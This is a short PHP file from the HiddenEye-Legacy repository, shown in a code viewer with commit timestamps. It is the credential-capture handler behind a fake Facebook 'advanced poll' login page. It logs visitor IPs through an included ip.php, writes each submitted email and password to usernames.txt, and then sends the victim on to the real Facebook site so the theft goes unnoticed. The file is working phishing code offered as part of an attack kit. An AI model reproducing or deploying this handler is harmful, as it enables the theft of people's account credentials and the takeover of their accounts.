HiddenEye-Legacy/WebPages/fb_advanced_poll/login.php

7 lines
201 B
PHP
Raw Normal View History

2018-03-26 22:24:30 +08:00
<?php
2018-06-07 17:19:12 +08:00
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://mbasic.facebook.com/');
2018-03-26 22:24:30 +08:00
exit();